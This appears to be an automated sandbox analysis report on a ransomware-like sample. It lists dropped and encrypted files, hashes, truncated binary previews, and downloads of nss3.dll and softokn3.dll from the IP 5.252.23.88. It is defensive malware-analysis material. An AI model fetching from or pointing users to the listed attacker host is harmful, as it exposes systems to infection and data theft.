Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\get[1].htm

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	562
Entropy (8bit):	5.984565326018443
Encrypted:	false
SSDEEP:	12:YGJ68KS7PPABNpHSyHxjr8CUv2GbFTpZW5+Dj6Z4:YgJKSIbS0JwXv9F1ZWiWG
MD5:	2B331EBFAC0F32339BF5A3F9E70E9D84
SHA1:	068D994106DB356B8EB5FC9F9DC93D62E1E96FEA
SHA-256:	F9495833E0B357E07119EA9B17C83C4079BD1D8A4B00692AB8A52BF2DFDE8EA3
SHA-512:	6916F6EC1B877D9DBEBA048D44538AC0E121726EB04432EF0D1AED1833CF3538FC7D2B3684AD886CFB5287EE1F314CED49FB72678AECFE0FC97B150EBE16D0F7
Malicious:	false
Reputation:	unknown
Preview:	{"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZIoES3aBnfV9yQIeN4pSfADnLZmif3fzwxyXwY05Pp\\ngxB9p4sT4lfYp+rCxrT\/f877KYEcRA9v0kYsc7Dj8pb+X9bcNl0\/BqUoG5\/JlrqD\\nStxD0XM\/r+7xUDqIqBHVp1tUJjT1DNqHMD9wbsWU1gfqMT+lJYcFtxp\/9v7z+DX9\\n0Brzn6wYB4Ldkt\/gkQsrK\/RVLj4OrGbiAZvpyTUMXOUXCg2xBJngUdnsYn0W7Jm9\\nvPa7n1mzktTo9MNgdpK+kXPc2eT4Pe6Sz+UUykgI5Ff4z51JI5Ej8Nie0ZWfhP0A\\nqwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/softokn3.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Reputation:	unknown
IE Cache URL:	http://5.252.23.88/nss3.dll
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\MSIMGSIZ.DAT

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	49454
Entropy (8bit):	7.995651698375661
Encrypted:	true
SSDEEP:	1536:tD68vUSC7ZiXUOmHX9q9Akq9vSk0MPxpeD:tjvUJ7ZiXswWSOy
MD5:	54046D322DA23CF4C8E7E71439B8D743
SHA1:	49F6776B10E390C60B11A0915989AD6E449EF112
SHA-256:	251743D2E75A977D450260227F9C3D5CBE0F3E4FD5DFE8C140B91190B25F39C8
SHA-512:	96C73A1DF56E4521939690EDA5CECF2CD08042A50B9063A39744A926F7B5FC01BD31084BF7679FB9C47DE811A9E0985F6291FD0A4B0EBF80D5A068E65B2EA147
Malicious:	false
Reputation:	unknown
Preview:	........C.O....b.90yx...c.."...k.k.B..2.;...E..^(@....F..[\9....=._..~..u....!..+.v..2...."B.&.9.Q..0.i...g.$m.......9........c..!.../.=<o..@...f.b5).0R.Bl:.F.......t....n..1.........\|.....5.x~9..8$...S........(.M.l2!..G...bm..#..?..........b..'_..m.u0.=3...cv$.?.,a.+.1./..ST^..............T.K.....x.i...'..ZY..d'T...X..7_)+\F.;.X..q...H.aM..w.Q......5.9.T.$....B.e.u~?p).3^...j..g.&v.$b.{p..=..I'.u.^-n...b1.w....Z....,+.....!E..At{eG.8.>.+>........\|.b-W.t0..I.3.z..!g8.i....%...]e..N6.N5.gT....Q4 .EN.k.R.v...j...h...2...i...t..^.\.b.R.....mkl4B.%H.T/.......M.l(.xE_S8.].p..f.o.-B...Cw.V~F..2.'G^...p[.F.........-.f.m...+.;..-.....\|s..."...(-.[2.D..Ne.Q.M-.(/.E.H@..;.rm.8....d$.(..w.@1...#Z...........D.%.2.iZOa.....LX...sb.y..x-.q...;...n0,c.%l.v$.D.}Z..^E.9...x..F..G~..9'...+.AV....4..5,..O&.mq.fls.Q.B]..R...vN..]w....`.EIj,.qz..H..R)....)..5..;b.t.!. %.s.. ...e..1r.5.....#.I.....6...t.Q...(......z.H....s~9.............%.3..b..Lq.. 2.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\SmartScreenCache.dat

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	123350
Entropy (8bit):	7.998586189956862
Encrypted:	true
SSDEEP:	3072:i0l/ReBov1NdPRp60o6LNmJcxyYqmSwCCl35nBHcfhgSvSR:jZmw1zRZzx1S3Cl35+f8
MD5:	D9206E94EBDC57C9404FCE980ED7D4C9
SHA1:	3306BC1A9CF8D31401A44AF0F655EC2E4BCEB873
SHA-256:	E04C514694322CC1A82AEF2CC7514E6D0CEE46794972F3B923A0A129B9BB5F5F
SHA-512:	C032BD4BB542E50BD266AF55F36693FAE948C5E8B8BC09E7B2F74259A1BA39BEA17EF37557F2C316C8339859F214C0195FD0C473F1E508CF9D7A7A172432FBC1
Malicious:	false
Reputation:	unknown
Preview:	0.rJ.[.15...."....m...b..g%..4..~.%..u....Yc..?.8...o..../.M........$0T.......).D>.b.V.r.C8.\|(.\..Hk..}.."..xb.m..(V!...R...7.."u.:.b..m..\i}.. .N..lJ#.J...."A...,R.tE.Y........w.4..0.4n..x.{'^._.g.!~q....}X.....'..J..y.;...U....@....t.y.L.>..!..N.....K..B...h......<....A(H.ATU.j..A_S.\.BZ.i.V...M..4H..$..n......?.K..)..].wbgM...O,...ejE....r.K.u-...S..[.r.B......{T.+$e..0.Q..+9....i.6..J.Pl......t.g........53.N.w.]#..}....._)5e]KX...,g'.@1..ku.h.....V..r...AH..oU..0!"...}...B.^z...J.dr./..C.Dn.D.K.p..~...{.nJ....=.`Z.I.@.b~].q....Z.xrEL_n.u-.N6++.b.v...IN$`#.}y....iW..'.".O.sFF...&./...R.y...?:..6W..K..!.q.1...$y.....\|..>@..5...&.E..Q.n...\2S.......]..nq"..j..C...9..$..P.\|.'.w..cN?..d....y=.B...w......?...9..,.D....e&...c....%..IS.....W....:.e.....M.......U....../......i.uL...4....E.e.%H.1VV....i. ...../...o..d...A ..^....$.Q..f..o..6.v!@..8........d...-T&...d...+9T...x...d\.=".rf6..qnh56(..s12.qh`.R..)....0K%.#..T?..Y4L....nv..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\deprecated.cookie

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	downloaded
Size (bytes):	425
Entropy (8bit):	7.441476826305252
Encrypted:	false
SSDEEP:	12:AZjVDmSFqI4e1Jp4FtZ90N9jB//Wj2anxdsDj6Z3cii9a:AdVDmSFqFSJuB9pjvxkWFbD
MD5:	9CD72B0E2CC8A286E09F1C4EA07E1D7F
SHA1:	0D2716C668C9615A8C9332E24B57284EF826A593
SHA-256:	C7486E7429A35AF496CF3AF6857524C7574FE4B79E71CFFFF8E86FFFF43B1A70
SHA-512:	3AC39C1231CBE0D3BEFCED07D1120CB2BFF2A5C1E317753F1001A3284AEA9FAE5302D4AA6441818CA966E987537759E651691B12268B448CC249D37CA8F29FBC
Malicious:	false
Reputation:	unknown
IE Cache URL:	t.me/
Preview:	Cooki...]9b..}..v..,...../..y.2.J..!.).)......<..P..z...T..Z........+....WD....8.S..Fi.d.......B`.-.HC.m\|.(.pEq6...+`...0..u..P...o.....].....\x..<Ln..bC..IDEzRv...J?>.....w.s....?).#.[..`...'...Z....>....I.>......I..P@v.....@.Nx..m.m.}%i..L....H..32...&H^..'...w...8.]....oR#.cS....^.,.o4........a:4.}?.^R.-.4.5....A:....xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\0mfrnngw.32d\unarchiver.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	7.361572204821195
Encrypted:	false
SSDEEP:	6:b1ht1rNPx/nAgpiHcxS7FVWB6eIvVht0fUBTQR2xRfuZ+6p7U6Dj6Z3cii96Z:59rHfmcg7FIU/VX0fUBUR2juZzpxDj6t
MD5:	A99E2FD75E29E5D7390A2449C098895A
SHA1:	5DFCA627CD09BD8934073CB831948815347BFFC1
SHA-256:	45453890D022733CE5E43BE2DD7D15C27B46C89E8D6381BEFB7A8A83C50D6006
SHA-512:	F4CCB9A3156BEDDBEC06F94449A3333FA93943B3CF8B39EA8F02BEBDD06B4D6D26ED1F41EE7A33D5A1590A3244AA3578DE59F026FB275DBEEAD52FBB9A5D45FE
Malicious:	false
Reputation:	unknown
Preview:	03/08...}M....q..\....H..*'.}.....{...9...4...P.LN.T....U.M;?."2R..~B...<.y..b.`.....[u...`8..........q.G..=...jF....Ov54....;xz.......w...V.o(. !c.w....+...'......G.>.....m.D._...}8Zd...YM.t..Ir.t....+C4...(O.1...`...LT...y...g..Y.....I.yBI..S.EE...,.^a.+....1.......B.....n..`U...+7.`@.+xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\AdobeARM.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	4499
Entropy (8bit):	7.956615864081817
Encrypted:	false
SSDEEP:	96:oCHptntXtYnE1bXwkLiN8YdpPiAprJ6+KExLpkwtJ2BDiAORjYA:Lphn3Bwku7Hq4E+VLDtAt1SsA
MD5:	930F9563EF091D218FA27EB75DB2AE1D
SHA1:	EB5716D2A7E1478BE959E5BFBA2E1E82EC91D159
SHA-256:	DEBDFA2117B37B9437EB7203D71425279CDBE991F59396F18D99AAB300922CCE
SHA-512:	03EE5F7BE4396C01CC6D20334091FFA31253F0B84E90D744F4C96C9789E275EF6BA7C26BFD9E276C4AE4BA818140CC732481440C607F23453B00DBF4DE04F462
Malicious:	false
Reputation:	unknown
Preview:	[2020......2....KpP.k....6........7~s...M.m+v........Z.DgE.U..j.......7.\|..cJ..+..Ek.Q..}.H\.....j2?i(4......,.<n.nm;(?.H....m<......(H...3/P.O.h....i%9..a.Ed.t..s&..g...#..2..^...+....Y.\..,s..jB...E.lN.i..A.........v.....85./.....y\.7u..@K..G1H.(..(..?c...C'...i.<...=.V......3!K.U.J/.^...I.$..o..&S>.......Y.R....... ..rc..Y......._1{....I...N0....D.:.S{.1.+!.j+e.%.9$0B.Y.2.p.[.!..............X...p. ..T.CE.cTp.x.!W.. X Vi=..Jb.VC-N>...h...:......c..!j.O...1Oe.lvj.....@fM.=...7.}.*D.Z.i...c..Q.E........p#.AF... ..a.[-D'.l.[.U.WHz_..o..^...H.o.j........~.u7...z...&g.8.;.0v...\|.0.o...o0.......x+.z.;..680....;..m.R...H~Y@.p..C...Y....G..J.T.g.eGa.b..R=0.!^.m...+.jo...&...r.........r0B/..c~.}...d..c~.....d.]-Mr".co.g..........7.5.Sf\|c..x.b.{T ..s..b-..U...k..NLx.S.TJ.XK[.N....X...l..q_......A...kN.KBP#.e.3.8~..A.AL..'$.e...,z.B.nG...QfM.x!.....]..N.1..;\|.x.A.-.v.B.#.{.e....3..y.\|Q.7.c.v...1X....S..ye...w.l....wJ.@..E....F...*.L....

C:\Users\user\AppData\Local\Temp\CR_14C6C.tmp\setup.exe

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	2674494
Entropy (8bit):	6.684471502050741
Encrypted:	false
SSDEEP:	49152:4rbr/3R1lRf+yAHLvThf0we+9fPF0RkBOETd4r0:abbAHPFDp4I
MD5:	6DBCCC9F9334584558ACE2EF8F711996
SHA1:	482F063C85645DD44F409856E659FFEAF92A368A
SHA-256:	3BD2E4E6FB0A8E85C0FFDB29C46B8E17BD76F409629965FF6B9B7B335F687E25
SHA-512:	E87950D66FF2E150F29FA6946D95C459F1F9A20997CC927DA68F9D2A362D9327E3FAA4D16CEC431B746C31F7E0DF178B8D8F91D1BFCBBAEAA92A90BC49F5EB46
Malicious:	true
Reputation:	unknown
Preview:	MZx..P.fB}i.. ..(H..peF..r].md..Y.._]..ldyD.Eu\|O..... ..P.t..y.66...1.:,...Y.#E.J.j..u..m.0..2....G.<3.S'..{..y...J/.Jn=......0D.^.)c7.....Se...<..]G...X.{...d.l<..."..j..7&,v.cK.TU.Z.0QD\|....7.g....34.B.Bg..k.d>..lbw...9..^..9.O...s.H....Q....(x.E..G....<...[.L.b D.0...B.......J.&.V...4...g.,]E...V.I.._5k^/<.l...M..H.....>}.O.S.C.u..M..j.4.ol.wK...m.pB?.....>.\..5.......4n.V....w....Q.UW.(.x...?RT...eM....c[...9.@......%...j..[.6KQ.M".S..3.....>.\|p.l.....J.JI....>.o.z.il.....l.?..>>..,#:5....w.H..$.$.g.{......K.^....PKW.{.c\.#m.*\E....(....5].d.i.O....;m........ar.{.kT.......U"....O.yj.....U>.Zl.A..[Z...........7.1..A....r.wjW..h!..[.w....7..~.Z1@j..za%.../......bz.R.F/..mj7...\3>i..9oG......}........Z6..F....BB..Q.n.\...k..nf.Y0............:...a0.z.....>.L...[.M....g.S[T#.Ey.._.....8Xv.O.1..NJ.n...S.e.....}.i.&.q.DC......\|h..>.w.=w.z..Zr....x...q&7.....NS...y...$..#.7m..Y..P..@..N..b7 ..].b..1...PF..;.=..u5.S[.l..\yu..../..m.W].....@.

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	423
Entropy (8bit):	7.408853386462209
Encrypted:	false
SSDEEP:	12:oYK64gvK8hD9Alxkb6z3/7hjsWvhenydV6Dj6Z3cii9a:oYOrjlz3jlkydOWFbD
MD5:	9ABA2EDDB6E7AC571FE42B63E6DA704E
SHA1:	00109969792F485CC1591C734468EB3DBCBB4357
SHA-256:	09DFAB3228465567630D189316C4BACD55ABF48E27F353DD0EE2481789569A51
SHA-512:	31F7D109E70AB1FDAFCAA44BD85CB42EC2BC6BE9A61F4F58E3435ECC7081F5BD8E341377CA575EA81E12966EF727FCB60752F139E69557B6D557989AE1F7CDAD
Malicious:	false
Reputation:	unknown
Preview:	[20206.A.U..q2j....<..y..N.....D.P.)Mi?l7.."U.'.w......osH'...d.b....gI..7x...4........L.%......s.....p.2....4.):.Y.y...5.....2...iH.'F.......r.1.}..fZx..u..`.1...y.Z..=...U....U.9Js!.G...{...N...}.....]......3.R...<...&~.~.;..i..I..>/.....{...!.d..ba.hh.1..wr.(sS......~..pQ=z.=p.>..\-........wc5=....9.A...P.]...h.Z8u..y...BGl.xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Temp\chrome_installer.log

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	21607
Entropy (8bit):	7.991879974940913
Encrypted:	true
SSDEEP:	384:bhVpTSYKTqzL3sMNiGHhLi/Ow2/1ok3BKHnfCbd73ukuQuHPJtIbPkBuWZDRkrI:NyqzDjNLHh2/zY1l3EnfGbmJ+IhQI
MD5:	2507042BB7E0F9A76D0C4AE1FBAB9513
SHA1:	8C59063C2DB72F8DC68F1BD322ED87D04B3A4848
SHA-256:	3AEB77C644B0953D32070A28AB9CABFCA6A2D776AB7F18C93D37A20B803A7FE0
SHA-512:	8EC15CA8472FCA2F6AADB0030EB8F71DE1EF1E3701F7DBC250D5D459137AD3987E186C8B66C58B51B6BD870E3BA575B866874523393D94D53BF8849462AC41B2
Malicious:	false
Reputation:	unknown
Preview:	[0930"......C..)l ...`...g(.z,.l}T..N}...:..OM.....).p>......#U.9...6.x..C...y..\"..5...O%t..G.)...(.w..hS.k..L.....'..'..I.G&h...V.... c`.....C1Xw.._O.p..e..9..}....Wa.;.T..+...c.[.;..'P.D...........?..<..j..A....m5...........t.xC0.!...:.G..;/`,..?....i+..Y....D...E_..3.\e...r?.../C\|^.(..+......>=...6.>[2.{E..6T..[8.a....\........?.H.u....{.l/=O...&.......h....dw.\|..o4...:.....`^..N.....G.....X...M..9...../.9\>..9......7z.,.N....vU.[m............j.x.$G.qm.'l.....S}.......j..p.PjI/..!;MS...K.[y.. M..}:G..z....k...B........`"....b...z.....7.3.K\|./.=,........6@g...&..R....k~...z6...g..~^.<G.8.:..M(....>g...$.AI...9.5Q...!Wz..gK...N...X...@..;k..:a.._..6+.p.....sf..r#..M....!.....w1.).....\s6/.o...{l,V2....J\:.k.v}.o.M_j...H..~.9036l^........lF...S..X..)..,...'.~...".GGZ..!zs..A9....s....x....Q@@*..a....L......2@.1...-9..'.n&..J...e&.K]Q.-&.e....j'.M..\.M...fi^\W..T).....r.k...,........B.(..Q....}.F.E.\|.....g..3...V]]X.s.....R`.j..G...u

C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	804174
Entropy (8bit):	7.92939012496502
Encrypted:	false
SSDEEP:	24576:ubLRhKqz0oCGd4BxMIf9AXTXVJDZH+T7LT:uJsqz0oldMryZHYT
MD5:	179C7C60E471A992FA430262C6DD38CC
SHA1:	3F6250DFCC1571055796DBF727F2227A17061D4A
SHA-256:	DFF3EAE09EA1A9ADB1DB94F334B307F6541C542BEBB7A07D9F7FC71ABC0503D8
SHA-512:	4D21871EF36C7BEB8C799F154D68BF1F8B79436C0297CF28E952712134CD21FCBCB0C6762E9A969C70D0EA5FDB87AF25487CD0083369CA9878D72C73EB1637DA
Malicious:	true
Reputation:	unknown
Preview:	MZ...C..=).i..O=.tr....g...I..I80.......S.P.>...jP........Kt[......t.....S..t".....i...hs.i..M.\.K...~P!.V._x.....t^..k.....#.7.$Q.q..fpY..Dvx_..+.....d.m`.F.o...S....K+c&..(.Q1c..i3&.hG...=@6@.......................S..Rs.5....R.u.h.....Ds.]......e..* ..^.}... t.C.......\|E46-..}w..2e.U....x.Z.U".s$.H...P.h....qRD.V..5...........Ej~..h......2.V_#...iz.H.l.r...N,..w+a"L...>...\|O.P...>u....i....Qd.9..1..yM.\|P1q.7..6PZ....a.k.i....J..Mj....}.]...1....:..K..A.....M.M..g.7..qW.\...B..<]E.4...]....w.7.:M...aW..Iy....?KQ.R.oa{E.....aI.m...........s...2.i......1..F..BK.1...q...MP.++q..93....6..Z.pF....R..D..z.y..........f./A..+.J{..%u.t.t.!l.`.@:_.....y\|Z..W.Q...S..5.cGM.....5.K ......M.....x..@..n.O..S.uY.......4`..}.8m&....e'0^.Y.....A@.1...N...w...t.`..G.HG.{F.;..u.._^...u.Z..:_.is.QT_.:..W.t}c..4xx..,. ...V{...;Y......BK..Z..su.DK...`.....=i+.q.\|......-.....d....M.X....Q..^.....%...gB....-).0.\|..Y.......]..d2..<...K.t[.a..O..(...n...95..}...

C:\Users\user\AppData\Local\a760d531-7692-44a9-9184-9844c48a2eda\Q5W0I0pzFI.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\bowsakkdestx.txt

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	896
Entropy (8bit):	7.742290410068317
Encrypted:	false
SSDEEP:	24:YB8W8edki7ufzP+seWdVeutimGEi5Tz+TWJYtoiuWFbD:YBgfP+seuVxtZGEUsW+toRWVD
MD5:	6F114F29F6F9B8EA408FBEA999F2D635
SHA1:	9D730D34E7A7066665FF018D9F6272EF5B5081FB
SHA-256:	E57A7A026F9CA006583BFB54D11F5249756E36944AEE28348E3837F2D82296D0
SHA-512:	5D459CB7B37ADF65017DD547A7D330DE909C94C33280E6D76BD1EF722E3392FF3970CB2CC8E27CCFBE8BCC2C2496556CD096DD286EBAB1FD16E1B7F28CF5861E
Malicious:	false
Reputation:	unknown
Preview:	{"pub.!D#~x..H$.f.....H...>..;\.S/@,....#.....,....r.E.j8......x....O...H.Q..b6XGcA.q.=;...3.....T}.p.q..;.^.PC...}o..^'.$..g.\.g.n.r.h}..z....P.b..b^.iu......6.K{......K....j.n,......\|B$u.......ji...?...m..;..p0P..m..j._.^.]LZ...X...v..,...K.u.q6o#..NAu..+9.k.D...g>..p].jd.y.P..m@....\|..-x..l.f......5_..,....g.......E..b..~R.F.#a......Ord."...].......Q.s.v.x...v...Tj.W....e.p+...........c3[.J b.H/..yf../.r334D.m..[.y.R:&ZK.P..}.`.e]..{......5.m..S>A4....S'.z.. .....%..\|.m..H._5.M....r>3...q.1.L%.EG.....La...x.I.k.z.z.....^3....}=.5fL_Ai.L1.LD.).PBN.u.Fi0....I...]f.gI[.....L6..g..v"4...%.2.e~d..Z..T..\..#...wT..[9..B.......?m.Cm6..9.....U.......!./...STv..<.0["eN.......V........&%.....=.a....&&.C....9$...) 9.z..i... .Q.+;..V.....;.0.w.......{...o....n..P.8..xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\CameraRoll.library-ms

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	7.868503526021263
Encrypted:	false
SSDEEP:	24:J0zJDtbCLXJWhWvggUZoT3HMpbCm1pNkrmT3Jd/GGT+f/0WFbD:J0zfu5IgEoTIbt1wu7/H1WVD
MD5:	D0629181A1CFDABB30B24A118C82C785
SHA1:	C3DF5FB4158FC5BEC1BF332F6D74A0DE5B7F27AA
SHA-256:	DAA93B1EB1C362C92194D2DDF93F73C34259238024FD8FC11F60AF8E86AF69DC
SHA-512:	0F0E9BF78DA109BE50C9747179EB8C4907C75CA3B8EBB2676BDA355F408DC6B0517AA681F392193EE15BA961C13FAE9432F06C7504E18390442DD66068359E4B
Malicious:	false
Reputation:	unknown
Preview:	<?xml..+ Q\?.=.k.m.Lx@..a.P`..B.....u.#...'.....t.%.~...../.`.P{_....p#pG..1@.^\| ....P.W.c.....0.(...;.....'..Al7...g...D(....!@.t..5.\.._......^7.J...r3-?6..Z xB.s.G.$..,..H.b......F...fXQ3....A..\|..@\|.e}a.}Pg...U..T.:Z<.......8.Am ..!...L...c...?FM.\|.e....\s..._.....dhQ]=..'.Z..U.&...].....~h.Qpt....v..+n{b...... ...-.D...();.8s........d.....&b!...$..fc/M.....a.t.L...7.....2Q...)....J .A.T..........~x.x~sw3r.......k..%......_.%..\J.D".(0..j.H..f..>. I..S...?3R...[@.;...S..!I....Ij....<K.P.E].+......_U...p...2.y5l....]....\|O...A..m7....\|Aq..Z.N....r.........[.....U.........3.)r.x..j.ge.,..8...k. Q...N.".e..Z.E..^......s.8B.._aW.MX.Sh4.4..8,..&...]..j.}.;..9S..i%.:1i.$..h.:.^.%\|..e.*...E.v.S@z..k..e.-.J....'.ai.(...c.^........`..~.>.t..q.F.."..+}......4.LG.^-.q.....C...h.S}Zn..h.z.....H.U#.w.I..t<.d....) @b...A$E.}2.$}..C.P.,}hI.......Gz.7.6..L...95.1.X.d.0h.."@X...k.R8]..!=e..s#...XR..\|....5...z`.%./..........s./....C....R.@..J.[.6....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Libraries\Documents.library-ms

Download File

Process:	C:\Users\user\Desktop\Q5W0I0pzFI.exe
File Type:	data
Category:	dropped
Size (bytes):	2445
Entropy (8bit):	7.926456744628742
Encrypted:	false
SSDEEP:	48:6Uok1yQmExIGobTKOPEnQqQxZnAmmFa230/LARtF0KyWVD:6UAQPIGobj84zAa2YmWKL
MD5:	E55AA2964A1F85D142F4F6ABF1FB3D98
SHA1:	15C1A045C04DFEC70B4133AEAE462BACEAAA9AD5
SHA-256:	0B756F9DC86CE791BA3575741FDE377D8C8E28A2ABB30D4898384B9575711B88
SHA-512:	38D40DF465DA506C216A838A074449F45A063150CEDAF5B0E3D87C06AFA8D6896477137789B6B12B2353FED400F47C5B4D2D1D57B687F2B96F3E5CE9C752736D
Malicious:	false
Reputation:	unknown
Preview:	<?xml...,.....l..Zt...T2c.z>....D..8.K,j...jYB.-...y2..\~.I......b.....b.....i..V.b....y$._.@r.!A.T..Q..-.V.0.R?....?[).`..~.1...G..$_..P...T...K8Gc....=/.....\|.zEW...B..j".[.b..z...c.v..1.U..G^...-.I. .=...nZ...Q"~.jl...C...&..^[U0.$.mp.[Kl..s.$...n_..Nk.cu'j..Q.o7.c.....B1<k.g.1..D6b<:c?1.hIQ...?.../...FS~u...!'..p7..X.s#.U.I..4...3E.]R^.:......x....,w..h.<Z..\..m..X.i........\Wq.!5r.v..........l.%.\....]....z.r.f?=..2j.....R..g)#.;.3..:m...^..../s...5.\....x......6....7$KViq.....k ......7....X..!?.j.W..\|%s..G..F..9..$..>C.T.l..Q....n.Vic..C..."Z..[.. 